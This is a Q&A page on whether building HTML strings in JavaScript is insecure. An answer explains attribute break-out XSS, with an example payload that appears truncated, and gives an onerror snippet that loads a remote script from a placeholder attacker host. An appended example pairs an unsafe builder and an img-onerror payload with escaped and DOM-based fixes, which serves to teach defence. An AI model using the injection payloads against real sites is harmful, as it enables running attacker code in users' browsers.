Is it really insecure to build HTML strings in Javascript?

Frontend · unresolved · 4 · 677
走了就别回头了 2020-12-13 08:35

The company that hosts our site reviews our code before deploying. They've recently told us this:

HTML strings should never be directly manipulated,

4 answers
  •  天命终不由人
    2020-12-13 09:11

    As you cannot inject script tags in modern browsers using .innerHTML, you will need to listen to an event:

    If this.au is somehow modified, it might contain something like this:

    ">Click to play
    

    And of course, to run bigger chunks of JavaScript, set onerror to:

    // Inject a <script> element so the browser fetches and runs remote code
    // ('www.my-evil-path.com' is the answer's placeholder for the attacker's host).
    var d = document, s = d.createElement('script');
    s.type = 'text/javascript';
    s.src = 'www.my-evil-path.com';
    d.body.appendChild(s);
    

    Thanks to Scimoster for the boilerplate
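The attribute break-out the answer describes, shown side by side with two fixes, as an added example that is not code from the question, the answer or Scimoster's boilerplate. It assumes a hypothetical `track` object whose `title` is attacker-controlled (the role `this.au` plays above). `buildPlayerUnsafe` concatenates the title straight into markup; `buildPlayerSafe` escapes it for the attribute context; `buildPlayerDom` avoids HTML strings altogether. `scanTags` and `countHandlers` are review-time helpers written for this demo (a rough, quote-aware tag tokenizer, not a real HTML parser or sanitizer) that show the unsafe output gaining a second element with a live `onerror` handler while the escaped output does not.

```javascript
// Added example for the Q&A above; not code from the question, the answer or
// Scimoster's boilerplate. Hypothetical names: a `track` object whose `title`
// is attacker-controlled (the role this.au plays in the answer).

// Vulnerable: untrusted text concatenated straight into markup. innerHTML will
// not execute an injected <script>, but a closing quote plus an <img onerror=...>
// escapes the attribute and the handler fires as soon as the image fails to load.
function buildPlayerUnsafe(track) {
  return '<a href="#" title="' + track.title + '">Click to play</a>';
}

// Escape for HTML text and double-quoted attribute values.
function escapeHtml(value) {
  var map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, function (ch) { return map[ch]; });
}

// Hardened string builder: every interpolated value is escaped for its context.
function buildPlayerSafe(track) {
  return '<a href="#" title="' + escapeHtml(track.title) + '">Click to play</a>';
}

// Better still: build DOM nodes instead of markup. The title is stored as an
// attribute value and never re-parsed, so there is no attribute to break out of.
// Browser-only (`doc` is the page's document); not exercised under Node.
function buildPlayerDom(doc, track) {
  var a = doc.createElement('a');
  a.setAttribute('href', '#');
  a.setAttribute('title', track.title);
  a.textContent = 'Click to play';
  return a;
}

// Review-time helper (assumption: a rough tokenizer for this demo, not a real
// HTML parser or sanitizer). It honours quoted attribute values, so `onerror=`
// sitting inside an escaped title is not mistaken for a live handler.
function scanTags(html) {
  var attr = '\\s+([^\\s=>"\']+)(?:\\s*=\\s*(?:"[^"]*"|\'[^\']*\'|[^\\s>"\']+))?';
  var tagRe = new RegExp('<([a-z][a-z0-9]*)((?:' + attr + ')*)\\s*/?>', 'gi');
  var attrRe = new RegExp(attr, 'gi');
  var tags = [], m, a;
  while ((m = tagRe.exec(html)) !== null) {
    var names = [];
    attrRe.lastIndex = 0;
    while ((a = attrRe.exec(m[2])) !== null) names.push(a[1].toLowerCase());
    tags.push({ name: m[1].toLowerCase(), attrs: names });
  }
  return tags;
}

// Number of on* event-handler attributes the browser would actually wire up.
function countHandlers(html) {
  return scanTags(html).reduce(function (n, t) {
    return n + t.attrs.filter(function (x) { return x.indexOf('on') === 0; }).length;
  }, 0);
}

// Constructed payload in the shape the answer describes (not a real track title).
var evilTitle = '"><img src="x" onerror="alert(1)">';
var demoTrack = { title: evilTitle };

// Unsafe output grows a second element with a live handler; the safe one does not.
var unsafeHtml = buildPlayerUnsafe(demoTrack);   // 2 tags, 1 handler
var safeHtml = buildPlayerSafe(demoTrack);       // 1 tag, 0 handlers
```

Note that escaping is context-specific: `escapeHtml` is only correct for text nodes and quoted attribute values. A value dropped into a URL attribute, an inline event handler or a `<script>` block needs different handling, which is the practical reason the reviewer's rule prefers DOM construction over assembling HTML strings at all.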
